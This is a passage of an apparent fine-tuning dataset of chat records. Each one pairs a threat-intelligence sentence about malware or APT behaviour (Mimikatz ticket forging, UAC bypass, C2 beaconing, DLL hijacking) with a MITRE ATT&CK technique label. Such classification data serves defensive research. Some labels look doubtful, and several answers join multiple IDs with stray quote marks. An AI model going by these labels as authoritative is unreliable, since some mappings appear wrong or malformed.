- "content": "’s LSADUMP::DCSync, KERBEROS::Golden, and KERBEROS::PTT modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "connects to external C2 infrastructure over the HTTP port."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has set up custom DNS servers to send commands to compromised hosts via TXT records."
- },
- {
- "role": "assistant",
- "content": "T1583.002 - DNS Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elknot, also known as BillGates, a very long live and active ddos botnet which targeted Linux systems and was later ported to the Windows platform[4]。. . Now we see Elknot setting its foot on both platforms for this vulnerability, and sharing the same C2 ."
- },
- {
- "role": "assistant",
- "content": "T1584.005 - Botnet"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can determine the IP addresses of domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite"
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OceanSalt can collect the victim’s IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015. Older versions of these USBSTEALER modules were previously described by our colleagues from ESET."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has accessed and hijacked online email communications using stolen credentials."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Linux has used ICMP, custom TCP, and UDP in outbound communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang malware RoyalDNS has used DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to execute the command net start to interact with services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may also receive batch commands from the C2 server to collect host information from the system. An example batch command is provided in Figure 11"
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups', 'T1069.001 - Permission Groups Discovery: Local Groups', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The NetWire payloads in all observed campaigns included nearly identical configurations. Specifically, the C2 domain clients[.]enigmasolutions[.]xyz and the password were the same"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P2P ZeuS added junk data to outgoing UDP packets to peer implants."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used tools that communicate with C2 over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky achieves persistence by creating a Registry entry in \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. These file stealers can also download and execute arbitrary code from the C&C server. As with many other tools used by the Gamaredon group, they come in four different coding languages: C/C++, C#, batch file and VBScript"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used batch scripts in its malware to install persistence mechanisms."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can gain system level privilege by passing \"SeDebugPrivilege\" to the \"AdjustTokenPrivilege\" API."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After encrypting log files, the log encryption module in deletes the original, unencrypted files from the host."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang can enumerate domain groups by executing \"net.exe group /domain\"."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rundll32.exe is used as a way of executing Flame at the command-line."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in collects information from the victim about installed anti-virus software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware gathers the victim's local IP address, MAC address, and external IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HiddenWasp downloads a tar compressed archive from a download server to the system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer used several tools for retrieving login and password information, including LaZagne and Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emissary injects its DLL file into a newly spawned Internet Explorer process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As seen in Figure 2, the VBA code builds the email body and attaches the malicious document to the email. We’ve seen both .docx and .lnk files being used as attachments. These are very similar to the content of the malicious attachments used in Gamaredon’s initial spearphishing campaigns. Figure 3 shows an email generated by this malicious component"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Encryption is definitely the simplest method to hide the C&C server. We have encountered cases where the port has been stored in the data section, in the Delphi form data, or randomly chosen from a range"
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader can write to the Registry under the \"%windir%\" variable to execute tasks."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has created a hidden directory under \"C:\\ProgramData\\Apple\\Updates\\\" and \"C:\\Users\\Public\\Documents\\Flash\\\"."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has collected e-mail addresses from targeted organizations from open Internet searches."
- },
- {
- "role": "assistant",
- "content": "T1589.002 - Email Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can record sound with the microphone."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon renamed a malicious service \"taskmgr\" to appear to be a legitimate version of Task Manager."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tasklist can be used to discover processes running on a system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "added \"junk data\" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a \"junk length\" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services"
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has consistently used a technique known as search order hijacking to run Vcrodat."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has encrypted its payload, a virtual file system, and various files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can search a list of running processes for Tr.exe."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XTunnel has been used to execute remote commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "relays traffic between a C2 server and a victim."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe has a command to delete a file from the machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has created new domain accounts on an ICS access server."
- },
- {
- "role": "assistant",
- "content": "T1136.002 - Create Account: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The locations: For root user path: /Library/CoreMediaIO/Plug-Ins/FCP-DAL/iOSScreenCapture.plugin/Contents/Resources/ processname: screenassistantd For regular user path: ~/Library/Spelling/ processname: spellagentd Subsequently, it implements the Loader::installLoader method, reading the hardcoded 64-bit Mach-O executable (magic value 0xFEEDFACF), and writing to the previously determined path and file"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Web Shell is a file containing backdoor functionality written in a web scripting language such ASP, ASPX, PHP or JSP. When a web shell is hosted on an internet facing victim system, an adversary can remotely access the system to perform malicious actions. Deep Panda is a China based threat group CrowdStrike has observed targeting companies in the defense, legal, telecommunication and financial industries. Crowdstrike has observed Deep Panda adopting web shells as their primary access back into a victim organization. This is an interesting shift as web shells have typically been seen as only a first stage into obtaining a persistent foothold in an environment. Previously, web shells were quickly abandoned once persistent second stage malware was successfully beaconing. Using a web shell as a primary backdoor gives Deep Panda several advantages"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used \"fsutil fsinfo drives\" to list connected drives."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indirect Code Execution Through INF and SCT This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "completes network communication via raw sockets."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target’s email account to send spearphishing emails to contacts in the victim’s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents"
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive', 'T1204.002 - User Execution: Malicious File', 'T1534 - Internal Spearphishing', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. The malware reads the subsequent C2 server response but implements no logic to act on the received data. Finally, REvil terminates execution"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike is an adversary simulation platform developed for penetration testers by Raphael Mudge, founder of Strategic Cyber LLC. Designed for interoperability with other platforms such as Metasploit, NMAP, and Powershell Empire, it can be run using Armitage, a graphic user interface (GUI) developed by Mudge, initially for Metasploit. Armitage and Cobalt Strike are designed around a team server that allows for the sharing of information and the ability to direct and execute well-coordinated actions."
- },
- {
- "role": "assistant",
- "content": "T1061 - Graphical User Interface"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor will modify the registry for the Windows Media Player to store its C&C configuration."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To authenticate to vCenter the threat actor used a stolen session cookie for a Privileged Access Management (PAM) account."
- },
- {
- "role": "assistant",
- "content": "T1550.004 - Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to inject itself into another process such as rundll32.exe and dllhost.exe."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(On the left is NavRAT, and on the right is the shellcode of ROKRAT): We performed the same analysis for the shellcode located in the downloaded image file and the shellcode is not exactly the same, but the design is very similar"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot has installed a second-stage script in the \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\" registry key."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user."
- },
- {
- "role": "assistant",
- "content": "T1565.003 - Runtime Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Close analysis of the delivered payloads and legitimate resources retrieved from URLs by the first stage malware dropper reveals that TA416 is once again using an updated version of PlugX malware to target their victims. Historically, the group has relied on a variety of legitimate antivirus files, including the Avast file resource wsc_proxy.exe, to begin the process of DLL search order hijacking that results in PlugX malware installation. In the January 2022 campaigns, TA416 used the PE file potplayermini.exe to initiate DLL search order hijacking. This is a legitimate executable file that is part of the publicly available media player Daum PotPlayer 1.5.29825, which Mandiant has previously documented as being susceptible to search order hijacking since at least 2016. The file DocConvDll.dll has also intermittently been used as a loader of the PlugX DAT configuration files. For those that are familiar with TA416’s historic tactics, techniques, and procedures (TTPs), this is highly similar to the Trident Loader method which the group used to install PlugX in previous campaigns"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke has been packed with junk code and strings."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
